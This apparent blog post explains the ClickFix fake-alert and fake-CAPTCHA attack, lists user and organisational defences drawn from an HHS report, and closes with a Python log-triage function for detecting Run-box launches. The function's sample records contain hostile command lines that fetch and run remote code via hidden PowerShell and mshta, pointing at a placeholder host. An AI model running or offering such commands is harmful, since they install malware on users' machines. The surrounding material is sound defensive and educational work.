What happens when you are confronted with ClickFix?
i.e. (from a LinkedIn post by Alex Zammit)
And this is just one example; see below for 4 more ClickFix examples.
Key Items to Keep in Mind
- Do Not Engage:
  - Avoid Clicking Links: Do not click on any links or buttons provided in the alert. This may lead to further infection or phishing attempts.
- Close the Window:
  - Force Close the Browser: If the alert prevents you from navigating, close the browser completely. You can use Task Manager (Windows) or Activity Monitor (Mac) to end the browser process if necessary.
- Run Antivirus/Malware Scans:
  - Use Trusted Software: Run a full scan using reliable antivirus or anti-malware software to detect and remove any potential threats.
- Clear Browser Data:
  - Clear Cache and Cookies: After dealing with the alert, clear your browser’s cache and cookies to remove any remnants of the malware.
- Update Software:
  - Keep Everything Updated: Ensure your operating system, browsers, and security software are up to date to protect against vulnerabilities.
- Educate Yourself and Others:
  - Stay Informed: Learn about common scams and how to recognize them. Share this knowledge with friends and family to help them avoid similar traps.
- Use Ad Blockers:
  - Prevent Pop-Ups: Consider using ad blockers or browser extensions that can help reduce the risk of encountering such malicious alerts in the future.
- Seek Professional Help:
  - Contact IT Support: If you’re unsure how to handle the situation, or if issues persist, consider seeking help from a professional who can assist with malware removal.
Doing more research, here is a report by the US government agency HHS:
It covers 4 examples, impersonating Google Chrome, Facebook, PDFSimpli, and reCAPTCHA.
A concise explanation of the attack from the first page:
The ClickFix tactic deceives users into downloading and running malware on their machines without involving a web browser for download or requiring manual file execution. It makes it possible to bypass web browser security features, such as Google Safe Browsing, and to appear less suspicious to unsuspecting corporate and individual users. In this type of attack, compromised websites show fake browser alerts, which usually warn the user that the webpage or document cannot be displayed correctly by the browser until they click the “Fix It” button and follow the outlined steps. This results in the user copying and executing malicious code that installs malware (without realizing they are downloading malware).

Since its discovery, a number of malware delivery campaigns using the same social engineering tactic have surfaced. The call to action may be “fix the problem,” while other times it is to “prove you are human” (on fake CAPTCHA pages). An analysis of the malware distribution infrastructure shows that the attackers could also be targeting users looking for games, PDF readers, Web3 web browsers and messaging apps, as well as users of the Zoom video conferencing app.

And recently Google Meet. It is safe to assume that any new application will be used as a lure to confuse the user into following instructions that download malware and infect their system.
These attacks started in March 2024 and have since evolved into different variants. Here is one from October 2024 using Google Meet:
Here are the recommendations:
Defense and Mitigations
Organizations should train users to identify and report suspicious activity to their security teams. This specific training can easily be integrated into an existing user training program; more specifically, here are some recommended mitigations and remediations against ClickFix attacks:
• Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
• Install and maintain updated anti-virus and anti-malware software on all endpoints.
• Implement robust email filtering to block phishing emails and malicious attachments.
• Use web filtering solutions to prevent access to known malicious websites.
• Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
• Use network segmentation to limit the spread of malware within the organization.
• Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
• Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
• Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
• Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
• Continuously monitor and analyze system and network logs for signs of compromise.
• Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
• Regularly back up important data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.
In other words, have a comprehensive security plan, with a security policy and more.
We could keep it simple with 3 actions:
- Do Not Engage:
  - Avoid Clicking Links: Do not click on any links or buttons provided in the alert. This may lead to further infection or phishing attempts.
- Close the Window:
  - Force Close the Browser: If the alert prevents you from navigating, close the browser completely. You can use Task Manager (Windows) or Activity Monitor (Mac) to end the browser process if necessary. (You must learn or understand how to “end the process”.)
- Inform the IT help desk or another IT-knowledgeable person. Reboot the system if no one is available. DO NOT FOLLOW THE INSTRUCTIONS.
I have just added a ClickFix add-on security policy section with examples on my Shop.
A site popped this “I’m not a Robot” check. The site injected a command into my clipboard and is trying to convince me to run it.
1) The first command asks me to open the Windows Run command box.
2) The second asks me to copy what’s in the clipboard to the Run window.
3) The third step runs the command.
The command uses some tricks to obfuscate the parameters being passed to the PowerShell CLI, very sneaky.
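As an added example (not from the LinkedIn post or the HHS report), here is a small triage function for the log monitoring the HHS list recommends, applied to the Run-box sequence described above: the Run dialog is hosted by explorer.exe, so an interpreter spawned by explorer.exe whose command line carries the parameter tricks the post mentions is worth an analyst's attention. Field names follow Sysmon Event ID 1 (process creation); the sample records and the example.invalid host are constructed.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample records shaped like Sysmon Event ID 1 fields (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\explorer.exe",  # Run box launches appear under explorer.exe
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/r)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/page.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign: user opens an editor
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": '"notepad++.exe" notes.txt'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",  # benign: scheduled admin script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\ProgramData\inventory.ps1"},
]

# Interpreters a pasted one-liner typically invokes from the Run box.
INTERPRETERS = re.compile(r"\\(powershell|pwsh|mshta|cmd|wscript|cscript)\.exe$", re.I)

# Parameter patterns rare in a user's own Run-box history but typical of pasted
# one-liners; each is paired with the reason reported to the analyst.
OBFUSCATION_HINTS = [
    (re.compile(r"(?<![\w-])-(e|ec|en|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"(?<![\w-])-w(indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"(?<![\w-])-(ep|executionpolicy)\s+bypass\b", re.I), "execution policy bypass"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory evaluation"),
    (re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl)\b", re.I), "remote download"),
    (re.compile(r"https?://", re.I), "URL in command line"),
]


def run_box_indicators(event: Dict[str, str]) -> List[str]:
    """Hints found in an interpreter spawned by explorer.exe; [] if none or not applicable."""
    if not event.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        return []
    if not INTERPRETERS.search(event.get("Image", "")):
        return []
    cmd = event.get("CommandLine", "")
    return [label for pattern, label in OBFUSCATION_HINTS if pattern.search(cmd)]


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (CommandLine, reasons) for each event that merits analyst attention."""
    return [(e["CommandLine"], run_box_indicators(e)) for e in events if run_box_indicators(e)]


if __name__ == "__main__":
    for cmd, reasons in triage(SAMPLE_EVENTS):
        print(cmd, "->", ", ".join(reasons))
```

A plain explorer.exe to powershell.exe launch is not flagged on its own, since users open PowerShell from the Start menu all the time; at least one parameter hint is required.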